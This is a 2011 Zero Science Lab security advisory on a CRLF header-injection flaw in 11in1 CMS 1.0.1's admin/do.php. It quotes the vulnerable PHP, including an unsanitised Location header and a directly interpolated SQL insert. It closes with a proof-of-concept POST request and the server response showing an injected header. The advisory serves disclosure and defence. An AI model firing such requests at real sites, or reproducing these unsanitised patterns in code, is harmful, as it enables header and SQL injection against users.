101 lines
No EOL
3.2 KiB
Text
101 lines
No EOL
3.2 KiB
Text
11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability
|
|
|
|
|
|
Vendor: 11in1
|
|
Product web page: http://www.11in1.org
|
|
Affected version: 1.0.1
|
|
|
|
Summary: Eleven in One is an open-source content management
|
|
system (CMS) that is powered by PHP and MySQL. It does not
|
|
only help you manage your personal blog but also maintain
|
|
your postings at social networks. By establishing consistency
|
|
among the data transmitted from and to the blog, this CMS
|
|
sustains continuous harmonization of your data over time.
|
|
|
|
Desc: Input passed to the 'content' parameter in 'do.php' on
|
|
line 2112 is not properly sanitised before being returned to
|
|
the user. This can be exploited to insert arbitrary HTTP
|
|
headers, which are included in a response sent to the user.
|
|
|
|
|
|
==============================================================
|
|
/admin/do.php:
|
|
--------------------------------------------------------------
|
|
|
|
2088: // update status
|
|
2089: else if(($action == "postStatus")&&($_SERVER["REQUEST_METHOD"] == "POST")&&($_SESSION['admin'] == 1))
|
|
2090: {
|
|
2091: $content = htmlspecialchars($_POST['content']);
|
|
2092:
|
|
2093: // Get database information
|
|
2094: $Database = new Database;
|
|
2095: $info = $Database->getInfo();
|
|
2096:
|
|
2097: // connect to database
|
|
2098: $conn = mysql_connect($info[0], $info[1], $info[2]);
|
|
2099: mysql_select_db($info[3], $conn);
|
|
2100:
|
|
2101: $date = date("Y-m-d H:i:s");
|
|
2102:
|
|
2103: // clear table
|
|
2104: $result = mysql_query("INSERT INTO 11in1_streamline (content, date) VALUES ('$content', '$date')");
|
|
2105:
|
|
2106: // close connection to db
|
|
2107: mysql_close($conn);
|
|
2108:
|
|
2109: // prepare success message
|
|
2110: $_SESSION['msg'] = array("title" => $lang_backend_request_executed, "msg" => $lang_backend_statusPosted, "url" => "streamline.php", "button" => $lang_error_goBack);
|
|
2111:
|
|
2112: header("Location: msg.php?connect=yes&status=$content");
|
|
2113: }
|
|
|
|
==============================================================
|
|
|
|
|
|
Tested on: Microsoft Windows XP Professional SP3 (EN)
|
|
Apache 2.2.21
|
|
MySQL 5.5.16
|
|
PHP 5.3.8
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
Zero Science Lab
|
|
|
|
|
|
|
|
Advisory ID: ZSL-2011-5055
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php
|
|
|
|
|
|
|
|
06.11.2011
|
|
|
|
------
|
|
|
|
|
|
POST /11in1/admin/do.php?action=postStatus HTTP/1.1
|
|
Content-Length: 47
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: PHPSESSID=s5vsgh5cu5vfs0alihug4ut2k6; phpMyAdmin=36g6t7ggq5ildo4uiff7b5n76rpl7n9m; pma_lang=be%40latin; pma_collation_connection=cp1250_czech_cs; pma_fontsize=81%25
|
|
Host: localhost:80
|
|
Connection: Keep-alive
|
|
Accept-Encoding: gzip,deflate
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
|
|
|
|
content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
|
|
|
|
--
|
|
|
|
HTTP/1.1 302 Found
|
|
Date: Sun, 06 Nov 2011 18:53:29 GMT
|
|
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
|
|
X-Powered-By: PHP/5.3.8
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
|
Pragma: no-cache
|
|
Location: msg.php?connect=yes&status=
|
|
ZSL-Custom-Header: love_injection
|
|
Content-Length: 1716
|
|
Keep-Alive: timeout=5, max=97
|
|
Connection: Keep-Alive
|
|
Content-Type: text/html |